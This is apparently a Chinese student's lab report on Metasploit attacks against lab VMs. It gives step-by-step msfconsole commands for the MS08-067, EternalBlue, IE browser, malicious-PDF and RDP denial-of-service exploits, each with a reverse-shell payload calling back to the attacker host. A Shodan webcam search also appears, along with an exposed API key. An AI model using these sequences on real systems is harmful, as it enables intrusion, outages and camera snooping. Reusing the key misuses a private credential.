目录
一、实验内容说明及基础问题回答
二、实验过程
- 主动攻击实践
- ms08_067
- ms17_010
- 针对浏览器的攻击
- ms11_050
- browser_autopwn
- ms10_046
- 对客户端的攻击
- Adobe
- 辅助模块的使用
- 成功应用auxiliary/dos/windows/rdp/ms12_020_maxchannelids模块(唯)
- 网络摄像头的查找
三、实验总结
一、实验基础问题回答
(1)用自己的话解释什么是 exploit , payload , encode.
- exploit
渗透攻击模块,利用系统服务应用中的漏洞取得权限 - payload
一段代码,用于渗透之后在目标主机上执行 - encode
用来对payload进行编码,主要是为了避免“坏字符”和做到免杀
二、实验过程
1.主动攻击实践
(1)ms08_067
- 攻击机kali——192.168.182.128 靶机:win2000——192.168.1.5
- 在攻击机kali输入msfconsole进入控制台,依次输入以下指令
use exploit/windows/smb/ms08_067_netapi show payloads set payload generic/shell_reverse_tcp //tcp反向回连 set LHOST 192.168.182.128 //攻击机ip set LPORT 5224//攻击端口 set RHOST 192.168.1.5 //靶机ip,特定漏洞端口已经固定 set target 0 //自动选择目标系统类型,匹配度较高 exploit //攻击
- 成功:
- 输入ipconfig/all,获取相关的MAC地址、IP地址、子网掩码、网关地址以及DNS
(2)ms17_010
- 攻击机kali——192.168.182.128 靶机:Microsoft Windows 7——192.168.182.44
- 进入msfconsole,输入以下指令
use exploit/windows/smb/ms17_010_eternalblue //使用漏洞
show payloads //显示可用攻击载荷
set payload generic/shell_reverse_tcp //选择攻击载荷
options //查看配置信息
set LHOST 192.168.182.128 //设置监听地址
set RHOSTS 192.168.182.44 //设置靶机地址
exploit //开始攻击
2.针对浏览器的攻击
(1)ms11_050
- 攻击机:kali 靶机:Microsoft Windows 7
- 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞 set payload windows/meterpreter/reverse_http //http反向回连 set LHOST 192.168.182.128 //攻击机ip set LPORT 5224 //攻击端口固定 set URIPATH 5224axy //统一资源标识符路径设置 exploit
- 但设置Internet选项后会出现IE浏览器的错误
(2)browser_autopwn
- 攻击机:kali 靶机:win2000
- 换一个漏洞`实施browser_autopwn模块 `
- 攻击机里进入msfconsole,然后分别输入:
use auxiliary/server/browser_autopwn2 set SRVHOST 192.168.182.128 set URIPATH auto show options
- 开始攻击,可以看到msf在不停的尝试不同的payload
- 尝试成功,输出了可被访问的URL:http://192.168.182.128:8080/auto并启动服务器
- 如图:
(3)ms10_046
- 攻击机:kali 靶机:WindowsXP
- 输入以下指令:
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader//使用浏览器ms10_046漏洞 set payload windows/meterpreter/reverse_http //http反向回连 set LHOST 192.168.182.128//攻击机ip set LPORT 5224 //攻击端口固定 exploit
- 在靶机的浏览器上输入:
http://192.168.182.128:80/ - 选择session,建立会话:
3.对客户端的攻击
(1)Adobe
- 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
use windows/fileformat/adobe_cooltype_sing set payload windows/meterpreter/reverse_tcp //tcp反向回连 set LHOST 192.168.182.128 //攻击机ip set LPORT 5224//攻击端口 set FILENAME 20175224.pdf //设置生成pdf文件的名字 exploit //攻击
- 将生成的pdf文件拷贝到靶机上
- 在kali上输入back退出当前模块,进入监听模块,输入以下命令:
use exploit/multi/handler //进入监听模块 set payload windows/meterpreter/reverse_tcp //tcp反向连接 set LHOST 192.168.182.128 //攻击机ip set LPORT 5224 //攻击端口固定 exploit
- 在靶机上打开20175224.pdf文件
- 攻击机显示攻击成功
- 靶机关闭PDF文件则失去权限
4.辅助模块的使用
(1)成功应用auxiliary/dos/windows/rdp/ms12_020_maxchannelids模块
- 攻击:kali 靶机:win2008
- 使用命令show auxiliary查看所有的辅助模块
- 使用MS12-020(CVE-2012-0002)蓝屏攻击
- 进入msfconsole
- 输入以下指令:
search ms12-020 //搜索漏洞 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //使用漏洞 options //查看配置信息 set RHOST 192.168.182.128 //设置攻击IP exploit //开始攻击
- 攻击成功
(2)网络摄像头的查找
- shodan官网注册账号,登陆查看账户API后设置APIKEY set F9MYLmsRI1qvIGG9LJvjYndut8hFvAB4
gather/shodan_search //查找网络摄像头 use auxiliary/gather/shodan_search //使用辅助模块 show options //查看需要输入的参数
set QUERY "webcamXP"
set RHOSTS 192.168.182.138
run
三、实验总结
(1)离实战还缺些什么技术或步骤?
现在对漏洞的了解还很匮乏,更不要说利用漏洞去攻击了。而且实验都是在防火墙等安全防护都关闭的情况下进行的,对于日常其实实现起来应该比较困难。在利用后门程序之前也应该对其进行检测。
(2)心得体会
本次实验学会了如何搜索漏洞,并在现有的漏洞环境下,尝试利用漏洞进行直接或间接主动攻击客户端。在整个过程中,其实找适合的虚拟机特别关键,整个过程耗费的时间大量集中在尝试不同虚拟机使其得以被攻击。不乏看出,打过补丁的虚拟机其抗攻击能力更强,这也提醒我们应时常更新配置。